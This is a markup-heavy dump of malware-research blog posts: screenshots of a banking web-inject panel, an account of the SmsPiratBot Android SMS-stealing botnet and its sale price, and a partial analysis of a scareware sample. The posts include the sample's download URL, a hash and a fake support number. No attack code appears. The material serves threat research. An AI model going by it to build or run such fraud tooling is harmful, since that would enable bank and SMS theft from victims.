style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNF8-ZsfhEOpn6irpZ3hUDTeNfN7T_zZrUBqKoSpxfvu8ywr3uH0vx4H81_WZwoP1UJJy1nBGn4gStUTkdtwKWAvQWyBF2RU5EzZEvR54Nhmga1PNEr2oMMOn0njZvWt70GPciDtrLeIk/s1600/09-01-2014+00-33-21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNF8-ZsfhEOpn6irpZ3hUDTeNfN7T_zZrUBqKoSpxfvu8ywr3uH0vx4H81_WZwoP1UJJy1nBGn4gStUTkdtwKWAvQWyBF2RU5EzZEvR54Nhmga1PNEr2oMMOn0njZvWt70GPciDtrLeIk/s1600/09-01-2014+00-33-21.png" height="186" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> </div> <div class="separator" style="clear: both; text-align: center;"> </div> <div class="separator" style="clear: both; text-align: center;"> </div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkkhUoLv2SZI9AH3e7aSe0NaV8QThFhbFRIyO_XfG-Rv_kNGRWj6HbpmxZSML12utTdKZaEC0wON3QZNOCw4kUbZo0OoTRbYFKFFKB1uqyUYFxNb8XlwfRyq0JZYmOoNxeTj3WV4zUOKU/s1600/09-01-2014+00-32-44.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkkhUoLv2SZI9AH3e7aSe0NaV8QThFhbFRIyO_XfG-Rv_kNGRWj6HbpmxZSML12utTdKZaEC0wON3QZNOCw4kUbZo0OoTRbYFKFFKB1uqyUYFxNb8XlwfRyq0JZYmOoNxeTj3WV4zUOKU/s1600/09-01-2014+00-32-44.png" height="245" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1ocJ8q363R_IqZuzA_49hYRZ9ufZe6ZFhSWQNUMx8llrxMr_0xfeteva5JrPFk3ap0MD2Xi1ppbijFDQ5rA-MiSgyRjjtR714WVSrZpvr_sgdTc7cpdldJeHV9KXhyphenhyphengq30-G5IQb3HyA/s1600/09-01-2014+00-33-49.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1ocJ8q363R_IqZuzA_49hYRZ9ufZe6ZFhSWQNUMx8llrxMr_0xfeteva5JrPFk3ap0MD2Xi1ppbijFDQ5rA-MiSgyRjjtR714WVSrZpvr_sgdTc7cpdldJeHV9KXhyphenhyphengq30-G5IQb3HyA/s1600/09-01-2014+00-33-49.png" height="331" width="400" /></a></div> <br /> Another panel, on SSL:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKdo-q2MdiT1QmJW7OKWvokCo9oUH5XCdDZhruzUDxJ2ugT9he18KIsbQNZpZ08j9vXNm1vU3CYUz1HOcQMNmY_h-fgVfks1l9_10aCS_2dZu7hvRhJqVrMTN-HpBA_d8F-POHxwfS-2s/s1600/22-01-2014+14-18-52.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKdo-q2MdiT1QmJW7OKWvokCo9oUH5XCdDZhruzUDxJ2ugT9he18KIsbQNZpZ08j9vXNm1vU3CYUz1HOcQMNmY_h-fgVfks1l9_10aCS_2dZu7hvRhJqVrMTN-HpBA_d8F-POHxwfS-2s/s1600/22-01-2014+14-18-52.png" height="130" width="400" /></a></div> <br /> Another panel, still on SSL:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwre1W9j3zRjrEa1h1FVAY016IWMcb8GO98T3du3H8JtZCM-E-srmol1u-PcQ_Zza0_GspBtI538tlXL5kj_5gS40zCjp2_SLHdmtJCSgJpgWjudEDTCJZFyOj4MYC_4BhtyqhB0qsaIQ/s1600/20-02-2014+15-02-46.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwre1W9j3zRjrEa1h1FVAY016IWMcb8GO98T3du3H8JtZCM-E-srmol1u-PcQ_Zza0_GspBtI538tlXL5kj_5gS40zCjp2_SLHdmtJCSgJpgWjudEDTCJZFyOj4MYC_4BhtyqhB0qsaIQ/s1600/20-02-2014+15-02-46.png" height="140" width="400" /></a></div> <br /> Details:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDRQj1bykRPEsp1R6DkxBzMc4k-MjEf3WGMTE3VMulyiZ1Gvga5nxX-_wqlVx0CDDuErlyU-7wKeUt7BHk3Flp0EtmPC8tbgjWNSFq7zUd8lBCU-wVwG1WLzL7s7kAQHwP_GCgz4ZTFgo/s1600/20-02-2014+15-28-51.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDRQj1bykRPEsp1R6DkxBzMc4k-MjEf3WGMTE3VMulyiZ1Gvga5nxX-_wqlVx0CDDuErlyU-7wKeUt7BHk3Flp0EtmPC8tbgjWNSFq7zUd8lBCU-wVwG1WLzL7s7kAQHwP_GCgz4ZTFgo/s1600/20-02-2014+15-28-51.png" height="347" width="400" /></a></div> <br /> Additional fields rules:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVg8dizbvsDCs4T7Ihvgrvcu-L29pqM1mntbFhf5VbFLi090_gkITNh683QN_xol0lFa1w9oRABdG3LvwXgDKckfW_ssMmpu32bc3rwMmas1ry_GgKtm0S4Q_y4-ULVGV3XaszggJaaRQ/s1600/20-02-2014+15-06-26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVg8dizbvsDCs4T7Ihvgrvcu-L29pqM1mntbFhf5VbFLi090_gkITNh683QN_xol0lFa1w9oRABdG3LvwXgDKckfW_ssMmpu32bc3rwMmas1ry_GgKtm0S4Q_y4-ULVGV3XaszggJaaRQ/s1600/20-02-2014+15-06-26.png" height="237" width="400" /></a></div> <br /> Additionnal fields rules (texts):<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfxtwWV0ngx54pgUU0ujehZhxT2De6KNubcrbo_GlDcpYDK0AdGVOp2kLnkRIMfx7AWogyuglUoTqMHIWiigeGcF2JxPoikDch7uMXw2e7Q0z_r_lz0AWsfHuorTCk_zJekXbUNi1xMgM/s1600/20-02-2014+15-07-25.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfxtwWV0ngx54pgUU0ujehZhxT2De6KNubcrbo_GlDcpYDK0AdGVOp2kLnkRIMfx7AWogyuglUoTqMHIWiigeGcF2JxPoikDch7uMXw2e7Q0z_r_lz0AWsfHuorTCk_zJekXbUNi1xMgM/s1600/20-02-2014+15-07-25.png" height="251" width="400" /></a></div> <br /> Edit rule:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5AafSGYMJS4tZWPLWHIz9IK-36Ig3WQCOj0nPYSuE7S6Xv-pET-6Me-x0-tp7B7-V0bK-GO3yzkKDqKu1_MVGTalomrl9R9M-sVBL0Zsl21FhAV3LXF3dQJEfQDU0yp4udZ4xkZHwWrM/s1600/20-02-2014+15-20-15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5AafSGYMJS4tZWPLWHIz9IK-36Ig3WQCOj0nPYSuE7S6Xv-pET-6Me-x0-tp7B7-V0bK-GO3yzkKDqKu1_MVGTalomrl9R9M-sVBL0Zsl21FhAV3LXF3dQJEfQDU0yp4udZ4xkZHwWrM/s1600/20-02-2014+15-20-15.png" height="233" width="400" /></a></div> <br /> Edit text:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD0PftmHUUdEOdOm2vM-l7gXWnqQb0jhIVM5juuwUOnwx6_7Ajq-n3IrNGYbueoiPPN14UPV0pXN8pRCojomZnL50Yqskq0Odcl30gmhzBE_nTUm0itIKTI4p1kyvIVWKZ4nOBo-5i77s/s1600/20-02-2014+15-18-21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD0PftmHUUdEOdOm2vM-l7gXWnqQb0jhIVM5juuwUOnwx6_7Ajq-n3IrNGYbueoiPPN14UPV0pXN8pRCojomZnL50Yqskq0Odcl30gmhzBE_nTUm0itIKTI4p1kyvIVWKZ4nOBo-5i77s/s1600/20-02-2014+15-18-21.png" height="262" width="400" /></a></div> <br /> VBV/MCSC rules:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsOBxcQD4K787WVt25rfs1bcigdo08NUVwa6XbzqeM58_z9jpDbZXnxvi2_Bh32Y0c7ivdgx-6vXUQ3xOycJn3IjRhkmU3j88vdn00NXId1dexQH1OqmslCQVY9sb0FwxK0A1B9JXUSic/s1600/20-02-2014+15-08-30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsOBxcQD4K787WVt25rfs1bcigdo08NUVwa6XbzqeM58_z9jpDbZXnxvi2_Bh32Y0c7ivdgx-6vXUQ3xOycJn3IjRhkmU3j88vdn00NXId1dexQH1OqmslCQVY9sb0FwxK0A1B9JXUSic/s1600/20-02-2014+15-08-30.png" height="116" width="400" /></a></div> <br /> Add a rule:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_CaZPobkMaxCFwtrH6ks9kBe_aCn3pJDjdTpyqlwZrZzajwAwALtdonse6GuNOdRUT-kButWpF7UB62ZvsgHPiyyKHKUxV-GInRNqFptEc6jELdkGTstoWV2BJ660ACHCAcnFw6nx0O4/s1600/20-02-2014+15-16-42.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_CaZPobkMaxCFwtrH6ks9kBe_aCn3pJDjdTpyqlwZrZzajwAwALtdonse6GuNOdRUT-kButWpF7UB62ZvsgHPiyyKHKUxV-GInRNqFptEc6jELdkGTstoWV2BJ660ACHCAcnFw6nx0O4/s1600/20-02-2014+15-16-42.png" height="233" width="400" /></a></div> <br /> Options:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPc8Hp1rzRE_Xelpu0EfhnDV7XUtj1oFC09B9O2FKZ5rK6cdu97v2loNk-bSM1wGcgic_UXOObjIqk0UmeVC_LkIMb3PVEPMgDlEkaXlr_E_gVLJSTuKhrPK9armGH9_YpEb-gkGpGNlc/s1600/20-02-2014+15-11-02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPc8Hp1rzRE_Xelpu0EfhnDV7XUtj1oFC09B9O2FKZ5rK6cdu97v2loNk-bSM1wGcgic_UXOObjIqk0UmeVC_LkIMb3PVEPMgDlEkaXlr_E_gVLJSTuKhrPK9armGH9_YpEb-gkGpGNlc/s1600/20-02-2014+15-11-02.png" height="342" width="400" /></a></div> <br /> Options (CC Checker):<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEP8945GEDUnizLdpQYMqdkbUeTeliWYN3-wMcd4yCQHiQL3EBX10ALKUGtyFVcDMUBfQMWobE_8ZTpCKIMonYa79948_lZzAVK7ou70NqQL22TV56fH4e-jtWuXYxdtHkBE8CfmaF0FE/s1600/20-02-2014+15-12-23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEP8945GEDUnizLdpQYMqdkbUeTeliWYN3-wMcd4yCQHiQL3EBX10ALKUGtyFVcDMUBfQMWobE_8ZTpCKIMonYa79948_lZzAVK7ou70NqQL22TV56fH4e-jtWuXYxdtHkBE8CfmaF0FE/s1600/20-02-2014+15-12-23.png" height="341" width="400" /></a></div> <br /> Files, dumped from another panel, targeting La banque Postal (a French bank):<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF3rrEh_OaN1F6grGTp8eCP0DjAwkUtt4By311QRKfMe-cSOLRnba38YTcAggt3eSPFNOIECRp3NVN8wFfqZtnHvE5gkRgy94hyphenhyphen2Geoy6X0SSfv1n27NvsRsNQ5VVFD_p7Kl9gKSMNHSA/s1600/02-01-2014+21-36-38.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF3rrEh_OaN1F6grGTp8eCP0DjAwkUtt4By311QRKfMe-cSOLRnba38YTcAggt3eSPFNOIECRp3NVN8wFfqZtnHvE5gkRgy94hyphenhyphen2Geoy6X0SSfv1n27NvsRsNQ5VVFD_p7Kl9gKSMNHSA/s1600/02-01-2014+21-36-38.png" /></a></div> https://www.xylibox.com/2014/05/atsengine.htmlnoreply@blogger.com (Steven K)0tag:blogger.com,1999:blog-5365964245877416061.post-8346825076151328872Sun, 27 Apr 2014 20:36:00 +00002014-04-27T22:36:47.158+02:00Android.Trojan.Rubobi.ASmsPiratBotСистема управления SmsPiratBotAnother Android botnet dumped recently.<br /> This malware can send and intercept sms from bots.<br /> Like most of android botnets, they are used mainly to target mobile banks like Sberbank (www.sberbank.ru - the biggest bank in Russia)<br />In Russia, you can transfer money from one card to another card through mobile sms<br /> This botnet is sold 120$ <br /> <br /> Fake App:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9j1K9PEwEvWZolpHK-1spsmUFvwW7I3UlFMWhSYfdVk1SxdC6JU3CR_Oe0r8_SdHkgVebzhEXGt6DDoRPmhNSa8StEuWN7DmQQ6Vue74841VwsB48ynESpaVJpzkNvZPKLj1HaCh9mrA/s1600/19-04-2014+18-25-51.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9j1K9PEwEvWZolpHK-1spsmUFvwW7I3UlFMWhSYfdVk1SxdC6JU3CR_Oe0r8_SdHkgVebzhEXGt6DDoRPmhNSa8StEuWN7DmQQ6Vue74841VwsB48ynESpaVJpzkNvZPKLj1HaCh9mrA/s1600/19-04-2014+18-25-51.png" /></a></div> MD5: <a href="http://www.foresafe.com/report/2EA5E73653D1454C04ECD48202DCC391">2ea5e73653d1454c04ecd48202dcc391</a><br /> <br /> Login:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrJyBfy8X1lPZz4YqaLgX5EPjarx_08P6MsLC_zGcDglWIYHlQO7J6t7eohVu44tIB3oCYvIc5i6oZmtl-XFd8IIWtltLiP21K-V79cn6SA5FmwnULEvRVxr1rD2kRtJTuJu4gEI5tNpY/s1600/19-04-2014+18-00-30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrJyBfy8X1lPZz4YqaLgX5EPjarx_08P6MsLC_zGcDglWIYHlQO7J6t7eohVu44tIB3oCYvIc5i6oZmtl-XFd8IIWtltLiP21K-V79cn6SA5FmwnULEvRVxr1rD2kRtJTuJu4gEI5tNpY/s1600/19-04-2014+18-00-30.png" height="197" width="400" /></a></div> <br /> System Stats:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfQFxtnt-bpXURLhRZ67-QD0mtbnYIQEws9_sHWmMeUwD339UJqYSf2buxbACOnHRSWWS5uUO6KHDTVhHlNs43phzP8EcH0NzcsIOXZAU2QEgTo2K2r7FXvcWNJ35ZjMRWh_3VnwLleoQ/s1600/19-04-2014+18-10-46.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfQFxtnt-bpXURLhRZ67-QD0mtbnYIQEws9_sHWmMeUwD339UJqYSf2buxbACOnHRSWWS5uUO6KHDTVhHlNs43phzP8EcH0NzcsIOXZAU2QEgTo2K2r7FXvcWNJ35ZjMRWh_3VnwLleoQ/s1600/19-04-2014+18-10-46.png" height="238" width="400" /></a></div> <br /> Countries:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXHbt9vSGDmsAMotzx7jCXPpHshPx0XmqCKwwIxDbOFtwo2BGEpSRn1EK4sKz43pxHXFpQYEXjqmy_8ED0uNh8vJmZ-WeE1wPosvduZ4rJVx_sbsXKAICo8cF1Gn3Eo_9oflAx94OP8Og/s1600/19-04-2014+18-11-34.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXHbt9vSGDmsAMotzx7jCXPpHshPx0XmqCKwwIxDbOFtwo2BGEpSRn1EK4sKz43pxHXFpQYEXjqmy_8ED0uNh8vJmZ-WeE1wPosvduZ4rJVx_sbsXKAICo8cF1Gn3Eo_9oflAx94OP8Og/s1600/19-04-2014+18-11-34.png" height="126" width="400" /></a></div> <br /> Operators:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh01N4NpOG0xRIzHLs5cFiLfNhO2ITlb8WPlPP9Ke8GjlBNMtK_9eZeheaNvuCYtSQI7JEyzwaBhVF6OZwWRG0_iabKierQYlvSfMcB3odIAQiMaf8dh3Igp3sm6S7Yf69P6wDxKP-D190/s1600/19-04-2014+18-11-56.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh01N4NpOG0xRIzHLs5cFiLfNhO2ITlb8WPlPP9Ke8GjlBNMtK_9eZeheaNvuCYtSQI7JEyzwaBhVF6OZwWRG0_iabKierQYlvSfMcB3odIAQiMaf8dh3Igp3sm6S7Yf69P6wDxKP-D190/s1600/19-04-2014+18-11-56.png" height="161" width="400" /></a></div> <br /> Task Stats:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgckl68xyXSh8r6vHxYUvLU2uECD3tDXjo18jEbHx0AcCuTRX3F4PcDfmMuNgw6DYk3fP6gW3IIGU2TgfDEDe58swXEFzVu7MBOMvk6SZBGrD8HieqG3G04zw_CS5S9AGvYKXk21SwxiLY/s1600/19-04-2014+18-12-52.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgckl68xyXSh8r6vHxYUvLU2uECD3tDXjo18jEbHx0AcCuTRX3F4PcDfmMuNgw6DYk3fP6gW3IIGU2TgfDEDe58swXEFzVu7MBOMvk6SZBGrD8HieqG3G04zw_CS5S9AGvYKXk21SwxiLY/s1600/19-04-2014+18-12-52.png" height="347" width="400" /></a></div> <br /> Task Editor:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkjnbithIwOywWJnXv7QsmuE1PrmieAaXq_tNDqNA245pXdvqUffSTMiCZDe0FkBrxwDqoXt7znYzti5Rlx_JZcNoQcdsKfukdilgQmJvhbypOLjAYQFFhlqEcuJ5uyYUJnN67f_fUc40/s1600/19-04-2014+18-16-11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkjnbithIwOywWJnXv7QsmuE1PrmieAaXq_tNDqNA245pXdvqUffSTMiCZDe0FkBrxwDqoXt7znYzti5Rlx_JZcNoQcdsKfukdilgQmJvhbypOLjAYQFFhlqEcuJ5uyYUJnN67f_fUc40/s1600/19-04-2014+18-16-11.png" height="351" width="400" /></a></div> <br /> Blacklist:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiv7Dr_yKMI6uDaKtklTtEYVpxiFSmmgSP4C1Y7J8thOupvTVZS_Gf8_GoDrFbdMQK4F8MZ08JfCL9pytEkKiCczPnUrahd8vWfEP150qHRid1VN06BU_i4U-aBKJ4mAck10xKyyleZwTk/s1600/19-04-2014+18-16-54.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiv7Dr_yKMI6uDaKtklTtEYVpxiFSmmgSP4C1Y7J8thOupvTVZS_Gf8_GoDrFbdMQK4F8MZ08JfCL9pytEkKiCczPnUrahd8vWfEP150qHRid1VN06BU_i4U-aBKJ4mAck10xKyyleZwTk/s1600/19-04-2014+18-16-54.png" height="201" width="400" /></a></div> <br /> Stored SMS:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHr4OXu04ao7tmZluSv0smk8ML4wZv6u1q1v5Yf5FasMEmh6lUTzOKFrT4X5xNt7yHuGBukx4KYRyCC-RQvr_NAnO_CvjcfRBeEvbdOhfrsFUVMc1e6Num7P9kjOoZg1oDJBNo_OgnuX0/s1600/19-04-2014+18-02-23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHr4OXu04ao7tmZluSv0smk8ML4wZv6u1q1v5Yf5FasMEmh6lUTzOKFrT4X5xNt7yHuGBukx4KYRyCC-RQvr_NAnO_CvjcfRBeEvbdOhfrsFUVMc1e6Num7P9kjOoZg1oDJBNo_OgnuX0/s1600/19-04-2014+18-02-23.png" height="341" width="400" /></a></div> <br /> Another panel:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrdfNBs6XCAxEOxIw8RN5epdKwS6WHozQGJ4uOF1uBFjTVpQWr51Dw2f5O7j0a-WUp2geB1wsa9niHOYKyaC3ZgrFhil7-d_WKRpg5QKizYW0hL_IWlDG7-79HhVlIaYMWSCgt3V2v9Hs/s1600/20-04-2014+04-01-19.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrdfNBs6XCAxEOxIw8RN5epdKwS6WHozQGJ4uOF1uBFjTVpQWr51Dw2f5O7j0a-WUp2geB1wsa9niHOYKyaC3ZgrFhil7-d_WKRpg5QKizYW0hL_IWlDG7-79HhVlIaYMWSCgt3V2v9Hs/s1600/20-04-2014+04-01-19.png" height="360" width="400" /></a></div> <br /> Structure:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVORvhnQoKONT6pZcPGWY9hJawEj4lSBDHStkIFM2cHKkQ01ZM-T3kr8b7uutCwi_y3Tf8RVRradcMIsFpKvH7uf_QEN46QjDW5y9hcjs3XNHXDgmiw361vhsO6p6V-RVODmSaEJ1Y32g/s1600/20-04-2014+04-24-34.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVORvhnQoKONT6pZcPGWY9hJawEj4lSBDHStkIFM2cHKkQ01ZM-T3kr8b7uutCwi_y3Tf8RVRradcMIsFpKvH7uf_QEN46QjDW5y9hcjs3XNHXDgmiw361vhsO6p6V-RVODmSaEJ1Y32g/s1600/20-04-2014+04-24-34.png" /></a></div> https://www.xylibox.com/2014/04/androidtrojanrubobia-smspiratbot.htmlnoreply@blogger.com (Steven K)5tag:blogger.com,1999:blog-5365964245877416061.post-2692274593472783524Sun, 27 Apr 2014 19:09:00 +00002014-04-27T21:09:33.945+02:001-866-286-6162ScarewareYour computer's file system has encountered a serious error. Please restart the computer or call support at 1-866-286-6162I've found a sample yesterday downloaded via this url: <a href="https://www.virustotal.com/en/url/680fdd7152a9019f62634c05c7dd197025c5c190f31198cca1c06fdb7cb46237/analysis/1398623762/">skyways.co/play.exe</a>, console application, and ugly code + scareware and third party FakeAV call center.<br /> All the following was so lame that i need to talk about this.<br /> <img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4iJ4cXTxcuhWWBGDL9NLhtqP8OjEQ5dg-7sM6b4J-Qpk4_CM24XL8mkrlRkV8nBtQd0XQxMLMIj00wJ8gNlKNU4a3etJmLdRNRqpgOLudS3QAzyUSbEjMg9_kDUj22cxlpebk3rfpjYE/s1600/27-04-2014+20-53-52.png" /> <br /> <br /> &nbsp;At first the malware will try to see if he's dropped into %SYSTEMROOT%/system/<br /> If it's not the case then he will create a file:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuPWFoUx4UbXBqLLhdyCEkZawI-5vOSWabCocICn9D4cZ9eDK3J1rK_e9WbxO09siNbu7CK8c8FUEOebC9eQAZRSeO8hYl6qxZEb1Os_CVFMs2TFCl1M7QXoHjLRiZeKEB7dM0OJ3X6rk/s1600/27-04-2014+19-33-11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuPWFoUx4UbXBqLLhdyCEkZawI-5vOSWabCocICn9D4cZ9eDK3J1rK_e9WbxO09siNbu7CK8c8FUEOebC9eQAZRSeO8hYl6qxZEb1Os_CVFMs2TFCl1M7QXoHjLRiZeKEB7dM0OJ3X6rk/s1600/27-04-2014+19-33-11.png" height="58" width="400" /></a></div> <br /> Then, you think he will write into the new file created but nope, he add a registry persistence, by using the api CreateProcess (oh god, why) instead of using RegCreateKey:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAQ_ZcR52Dawy_hriWScuwdRH-mEnqkHS44TGum3T4gZVRlpfQBKirKMeEFG8XP_bkqER72cR2uiC_HIY9GtEq0CyCHWLepOlRS7xafCXax-rEUUwB0EuGAdmuHsNlVdT_xxc21n532xc/s1600/27-04-2014+19-45-52.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAQ_ZcR52Dawy_hriWScuwdRH-mEnqkHS44TGum3T4gZVRlpfQBKirKMeEFG8XP_bkqER72cR2uiC_HIY9GtEq0CyCHWLepOlRS7xafCXax-rEUUwB0EuGAdmuHsNlVdT_xxc21n532xc/s1600/27-04-2014+19-45-52.png" height="60" width="400" /></a></div> <br /> Wrote finally the file:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCkY0fsgoIXdr6RNt7H9Win4tdBJSZZ8B0dPqardOeV2PCjmZusKfIeIaqV23g9hrLnFIWU9XbdQ52MXO23mDGjoqiim8vQ94dwb8iEp0wTrLlkwydHwarp4NpWcpCJ9I2els7FUQT4VM/s1600/27-04-2014+19-58-05.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCkY0fsgoIXdr6RNt7H9Win4tdBJSZZ8B0dPqardOeV2PCjmZusKfIeIaqV23g9hrLnFIWU9XbdQ52MXO23mDGjoqiim8vQ94dwb8iEp0wTrLlkwydHwarp4NpWcpCJ9I2els7FUQT4VM/s1600/27-04-2014+19-58-05.png" height="63" width="400" /></a></div> <br /> Wait 5 minutes then display a message box:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvZ7OxYk4kYFark2nL7ap8-vWyD5M-h4ZakoHjdBCfIQpNkf2ZUZ-7JPppccUPdMI1EfaZDu0HiyMPC9ibe-wNy1drqQ1dmDCXot9cO1vZtUpZSDzaqb8rLgTXOinbT3v0V8XeBoTOEbw/s1600/27-04-2014+20-19-06.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" 